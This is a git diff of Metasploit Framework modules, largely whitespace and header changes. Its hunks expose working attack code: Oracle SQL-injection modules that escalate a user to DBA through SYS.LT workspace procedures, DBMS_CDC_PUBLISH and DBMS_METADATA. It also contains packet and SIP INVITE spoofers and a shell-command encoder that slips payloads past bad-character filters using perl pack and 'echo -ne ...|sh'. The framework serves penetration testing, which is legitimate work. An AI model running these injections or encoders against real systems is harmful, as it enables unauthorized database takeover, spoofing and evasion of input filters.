@@ -31,9 +35,9 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Oct 22 2008')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), ], self.class) end @@ -41,10 +45,10 @@ class Metasploit3 < Msf::Auxiliary def run return if not check_dependencies - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) function = " - CREATE OR REPLACE FUNCTION #{name} + CREATE OR REPLACE FUNCTION #{name} RETURN VARCHAR2 AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb index 82b0da9803..5d52079dc8 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,11 +19,11 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE', 'Description' => %q{ - The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE - procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege + The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE + procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted - EXECUTE_CATALOG_ROLE have the required privilege. - Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. + EXECUTE_CATALOG_ROLE have the required privilege. + Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU. }, 'Author' => [ 'MC' ], @@ -32,19 +36,19 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Oct 22 2008')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), ], self.class) end def run return if not check_dependencies - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) function = " - CREATE OR REPLACE FUNCTION #{name} + CREATE OR REPLACE FUNCTION #{name} RETURN VARCHAR2 AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb index 6010a6c56c..cf877aad8d 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,10 +19,10 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE', 'Description' => %q{ - The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE - procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege + The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE + procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted - EXECUTE_CATALOG_ROLE have the required privilege. + EXECUTE_CATALOG_ROLE have the required privilege. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -31,21 +35,21 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Apr 26 2010')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), ], self.class) end def run return if not check_dependencies - name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) var1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) var2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) function = " -CREATE OR REPLACE FUNCTION #{name} +CREATE OR REPLACE FUNCTION #{name} RETURN VARCHAR2 AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION; @@ -76,7 +80,7 @@ EXECUTE IMMEDIATE #{var1}; EXECUTE IMMEDIATE #{var2}; END; | - + print_status("Attempting sql injection on SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE...") prepare_exec(encoded_sql) print_status("Done...") diff --git a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb index f4bf9b4254..1fdb455775 100644 --- a/modules/auxiliary/sqli/oracle/dbms_export_extension.rb +++ b/modules/auxiliary/sqli/oracle/dbms_export_extension.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,7 +19,7 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'SQL Injection via DBMS_EXPORT_EXTENSION.', 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting an + This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. Note: This module has been tested against 9i, 10gR1 and 10gR2. @@ -32,15 +36,15 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Apr 26 2006')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]), ], self.class) end def run return if not check_dependencies - + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb index 81b9fdbdb0..fb0ba954d5 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_granted_xml.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,23 +31,23 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 5 2008')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end def run return if not check_dependencies - name = Rex::Text.rand_text_alpha(rand(10) + 1) + name = Rex::Text.rand_text_alpha(rand(10) + 1) function = " create or replace function #{datastore['DBUSER']}.#{name} return varchar2 authid current_user is pragma autonomous_transaction; - begin + begin execute immediate '#{datastore['SQL']}'; - return ''; + return ''; end; " diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb index b5f72fca99..fcb6c851cd 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_get_xml.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,23 +31,23 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 5 2008')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end def run return if not check_dependencies - name = Rex::Text.rand_text_alpha(rand(10) + 1) + name = Rex::Text.rand_text_alpha(rand(10) + 1) function = " create or replace function #{datastore['DBUSER']}.#{name} return varchar2 authid current_user is pragma autonomous_transaction; - begin + begin execute immediate '#{datastore['SQL']}'; - return ''; + return ''; end; " @@ -54,12 +58,12 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending function...") prepare_exec(function) - begin + begin print_status("Attempting sql injection on SYS.DBMS_METADATA.GET_XML...") prepare_exec(package) rescue ::OCIError => e print_status("Removing function '#{name}'...") prepare_exec(clean) end - end + end end diff --git a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb index a968a45d26..3fe01fbcf3 100644 --- a/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb +++ b/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,23 +31,23 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 5 2008')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end def run return if not check_dependencies - name = Rex::Text.rand_text_alpha(rand(10) + 1) + name = Rex::Text.rand_text_alpha(rand(10) + 1) function = " create or replace function #{datastore['DBUSER']}.#{name} return varchar2 authid current_user is pragma autonomous_transaction; - begin + begin execute immediate '#{datastore['SQL']}'; - return ''; + return ''; end; " @@ -54,7 +58,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending function...") prepare_exec(function) - + begin print_status("Attempting sql injection on SYS.DBMS_METADATA.OPEN...") prepare_exec(package) diff --git a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb index 2e9f67042b..d9c647b2f3 100644 --- a/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_compressworkspace.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,9 +33,9 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Nov 11, 2008')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end @@ -40,9 +44,9 @@ class Metasploit3 < Msf::Auxiliary name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) cruft = Rex::Text.rand_text_alpha_upper(1) - + function = " - CREATE OR REPLACE FUNCTION #{cruft} + CREATE OR REPLACE FUNCTION #{cruft} RETURN VARCHAR2 AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; @@ -53,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary END;" package1 = "BEGIN SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;" - + package2 = "BEGIN SYS.LT.COMPRESSWORKSPACETREE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END;" clean = "DROP FUNCTION #{cruft}" @@ -62,7 +66,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Sending function...") prepare_exec(function) - + begin prepare_exec(package1) prepare_exec(package2) diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb index 134eb3f065..3de3552e81 100644 --- a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,10 +19,10 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method', 'Description' => %q{ - This module will escalate a Oracle DB user to DBA by exploiting - an sql injection bug in the SYS.LT.FINDRICSET package via Evil - Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on - thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical + This module will escalate a Oracle DB user to DBA by exploiting + an sql injection bug in the SYS.LT.FINDRICSET package via Evil + Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on + thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical Patch update October 2007. }, 'Author' => ['CG'], @@ -33,9 +37,9 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Oct 17 2007')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb index a870f0d237..9eb54094d2 100644 --- a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -31,9 +35,9 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Oct 22 2008')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end @@ -45,9 +49,9 @@ class Metasploit3 < Msf::Auxiliary rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) cruft = Rex::Text.rand_text_alpha_upper(1) - + function = " - CREATE OR REPLACE FUNCTION #{cruft} + CREATE OR REPLACE FUNCTION #{cruft} RETURN VARCHAR2 AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; @@ -58,14 +62,14 @@ class Metasploit3 < Msf::Auxiliary END;" package1 = %Q| - BEGIN - SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + BEGIN + SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | package2 = %Q| - BEGIN - SYS.LT.MERGEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + BEGIN + SYS.LT.MERGEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb index f573d03db3..e423b0ffef 100644 --- a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -30,9 +34,9 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jan 2009')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end @@ -44,9 +48,9 @@ class Metasploit3 < Msf::Auxiliary rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) cruft = Rex::Text.rand_text_alpha_upper(1) - + function = " - CREATE OR REPLACE FUNCTION #{cruft} + CREATE OR REPLACE FUNCTION #{cruft} RETURN VARCHAR2 AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; @@ -57,14 +61,14 @@ class Metasploit3 < Msf::Auxiliary END;" package1 = %Q| - BEGIN - SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + BEGIN + SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | package2 = %Q| - BEGIN - SYS.LT.REMOVEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + BEGIN + SYS.LT.REMOVEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb index 17dd33be54..0347a6df73 100644 --- a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb +++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,9 +33,9 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'May 4 2009')) - register_options( + register_options( [ - OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), ], self.class) end @@ -43,9 +47,9 @@ class Metasploit3 < Msf::Auxiliary rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) cruft = Rex::Text.rand_text_alpha_upper(rand(5) + 1) - + function = " - CREATE OR REPLACE FUNCTION #{cruft} + CREATE OR REPLACE FUNCTION #{cruft} RETURN VARCHAR2 AUTHID CURRENT_USER AS PRAGMA AUTONOMOUS_TRANSACTION; @@ -56,14 +60,14 @@ class Metasploit3 < Msf::Auxiliary END;" package1 = %Q| - BEGIN - SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + BEGIN + SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | package2 = %Q| - BEGIN - SYS.LT.ROLLBACKWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + BEGIN + SYS.LT.ROLLBACKWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); END; | diff --git a/modules/auxiliary/test/eth_spoof.rb b/modules/auxiliary/test/eth_spoof.rb index 34647ea92a..b954636220 100644 --- a/modules/auxiliary/test/eth_spoof.rb +++ b/modules/auxiliary/test/eth_spoof.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture - + def initialize super( 'Name' => 'Simple Ethernet Frame Spoofer', @@ -51,13 +51,13 @@ class Metasploit3 < Msf::Auxiliary r.l4.dst_port = 0x42 r.l4.payload = "SPOOOOOFED" r.l4.fix!(r.l3.src_ip, r.l3.dst_ip) - + 1.upto(10) do capture.inject(r.pack) end - + close_pcap() print_status("Finished sending") end - + end diff --git a/modules/auxiliary/test/ip_spoof.rb b/modules/auxiliary/test/ip_spoof.rb index e6fda4d854..cc61dc23d9 100644 --- a/modules/auxiliary/test/ip_spoof.rb +++ b/modules/auxiliary/test/ip_spoof.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'Simple IP Spoofing Tester', @@ -48,14 +48,14 @@ class Metasploit3 < Msf::Auxiliary n.l3.protocol = 17 n.l3.id = 0xdead n.l3.ttl = 255 - + n.l4 = Racket::L4::UDP.new n.l4.src_port = 53 n.l4.dst_port = 53 n.l4.payload = "HELLO WORLD" - - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) - + + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) + buff = n.pack ret = send(ip,buff) if ret == :done @@ -75,5 +75,5 @@ class Metasploit3 < Msf::Auxiliary return :done end - + end diff --git a/modules/auxiliary/test/recon_passive.rb b/modules/auxiliary/test/recon_passive.rb index 34a1ca514d..f1120e2298 100644 --- a/modules/auxiliary/test/recon_passive.rb +++ b/modules/auxiliary/test/recon_passive.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,10 +14,10 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Auxiliary::Report include Msf::Exploit::Remote::Tcp - + def initialize super( 'Name' => 'Simple Recon Module Tester', @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary [ ['Continuous Port Sweep'] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Continuous Port Sweep' ] @@ -39,13 +39,13 @@ class Metasploit3 < Msf::Auxiliary [ Opt::RHOST, Opt::RPORT, - ], self.class) + ], self.class) end def run print_status("Running the simple recon module with action #{action.name}") - + case action.name when 'Continuous Port Sweep' while (true) @@ -56,14 +56,14 @@ class Metasploit3 < Msf::Auxiliary end end end - + def prober begin connect disconnect report_host(:host => datastore['RHOST']) report_service( - :host => datastore['RHOST'], + :host => datastore['RHOST'], :port => datastore['RPORT'], :proto => 'tcp' ) @@ -74,8 +74,7 @@ class Metasploit3 < Msf::Auxiliary else print_status(e.to_s) end - end + end end - -end \ No newline at end of file +end diff --git a/modules/auxiliary/test/scanner_batch.rb b/modules/auxiliary/test/scanner_batch.rb index 13784e4049..47b9948321 100644 --- a/modules/auxiliary/test/scanner_batch.rb +++ b/modules/auxiliary/test/scanner_batch.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,7 +16,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'Simple Recon Module Tester', @@ -29,16 +29,16 @@ class Metasploit3 < Msf::Auxiliary register_options( [ Opt::RPORT, - ], self.class) + ], self.class) end def run_batch_size 3 end - + def run_batch(batch) print_status("Working on batch #{batch.join(",")}") end - -end \ No newline at end of file + +end diff --git a/modules/auxiliary/test/scanner_host.rb b/modules/auxiliary/test/scanner_host.rb index 36d63da935..8417ce4e1c 100644 --- a/modules/auxiliary/test/scanner_host.rb +++ b/modules/auxiliary/test/scanner_host.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,7 +16,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'Simple Recon Module Tester', @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ Opt::RPORT, - ], self.class) + ], self.class) end @@ -37,5 +37,4 @@ class Metasploit3 < Msf::Auxiliary print_status("Working on host #{ip}") end - -end \ No newline at end of file +end diff --git a/modules/auxiliary/test/scanner_range.rb b/modules/auxiliary/test/scanner_range.rb index a2adb08887..24c7b2e7ca 100644 --- a/modules/auxiliary/test/scanner_range.rb +++ b/modules/auxiliary/test/scanner_range.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,7 +16,7 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'Simple Recon Module Tester', @@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ Opt::RPORT, - ], self.class) + ], self.class) end @@ -37,5 +37,5 @@ class Metasploit3 < Msf::Auxiliary print_status("Working on range #{range}") end - + end \ No newline at end of file diff --git a/modules/auxiliary/voip/sip_invite_spoof.rb b/modules/auxiliary/voip/sip_invite_spoof.rb index d3aa30f470..e658fed70b 100644 --- a/modules/auxiliary/voip/sip_invite_spoof.rb +++ b/modules/auxiliary/voip/sip_invite_spoof.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -14,10 +14,10 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - + include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner - + def initialize super( 'Name' => 'SIP Invite Spoof', @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'Author' => 'David Maynor ', 'License' => MSF_LICENSE ) - + deregister_options('Proxies','SSL','RHOST') register_options( [ @@ -38,9 +38,9 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - + begin - + name=datastore['MSG'] src=datastore['SRCADDR'] connect_udp @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary req << "Contact: " + "\r\n\r\n" udp_sock.put(req) disconnect_udp - + rescue Errno::EACCES end end diff --git a/modules/encoders/cmd/generic_sh.rb b/modules/encoders/cmd/generic_sh.rb index f3aff8bde8..0873632d69 100644 --- a/modules/encoders/cmd/generic_sh.rb +++ b/modules/encoders/cmd/generic_sh.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -30,17 +30,17 @@ class Metasploit3 < Msf::Encoder 'Arch' => ARCH_CMD) end - + # # Encodes the payload # def encode_block(state, buf) - + # Skip encoding for empty badchars if(state.badchars.length == 0) return buf end - + if (state.badchars.include?("-")) # Then neither of the others will work. Get rid of spaces and hope # for the best. This obviously won't work if the command already @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Encoder buf = encode_block_bash_echo(state,buf) end end - + return buf end @@ -66,26 +66,26 @@ class Metasploit3 < Msf::Encoder # def encode_block_perl(state, buf) - hex = buf.unpack("H*") + hex = buf.unpack("H*") cmd = 'perl -e ' qot = ',-:.=+!@#$%^&' - + # Find a quoting character to use state.badchars.unpack('C*') { |c| qot.delete(c.chr) } - + # Throw an error if we ran out of quotes raise RuntimeError if qot.length == 0 - + sep = qot[0].chr - + # Convert spaces to IFS... if (state.badchars.include?(" ")) cmd.gsub!(/\s/, '${IFS}') end - + # Can we use single quotes to enclose the command string? if (state.badchars.include?("'")) - + if (state.badchars.match(/\(|\)/)) # No paranthesis... @@ -93,43 +93,43 @@ class Metasploit3 < Msf::Encoder end cmd << "system\\(pack\\(qq#{sep}H\\*#{sep},qq#{sep}#{hex}#{sep}\\)\\)" - + else if (state.badchars.match(/\(|\)/)) if (state.badchars.include?(" ")) # No spaces allowed, no paranthesis, give up... raise RuntimeError end - + cmd << "'system pack qq#{sep}H*#{sep},qq#{sep}#{hex}#{sep}'" else cmd << "'system(pack(qq#{sep}H*#{sep},qq#{sep}#{hex}#{sep}))'" end end - + return cmd end - + # # Uses bash's echo -ne command to hex encode the command string # def encode_block_bash_echo(state, buf) - + hex = '' - + # Can we use single quotes to enclose the echo arguments? if (state.badchars.include?("'")) hex = buf.unpack('C*').collect { |c| "\\\\\\x%.2x" % c }.join else hex = "'" + buf.unpack('C*').collect { |c| "\\x%.2x" % c }.join + "'" end - + # Are pipe characters restricted? if (state.badchars.include?("|")) # How about backticks? if (state.badchars.include?("`")) # Last ditch effort, dollar paren - if (state.badchars.include?("$") or state.badchars.include?("(")) + if (state.badchars.include?("$") or state.badchars.include?("(")) raise RuntimeError else buf = "$(/bin/echo -ne #{hex})" @@ -140,13 +140,13 @@ class Metasploit3 < Msf::Encoder else buf = "/bin/echo -ne #{hex}|sh" end - + # Remove spaces from the command string if (state.badchars.include?(" ")) buf.gsub!(/\s/, '${IFS}') end - + return buf - end + end end diff --git a/modules/encoders/cmd/ifs.rb 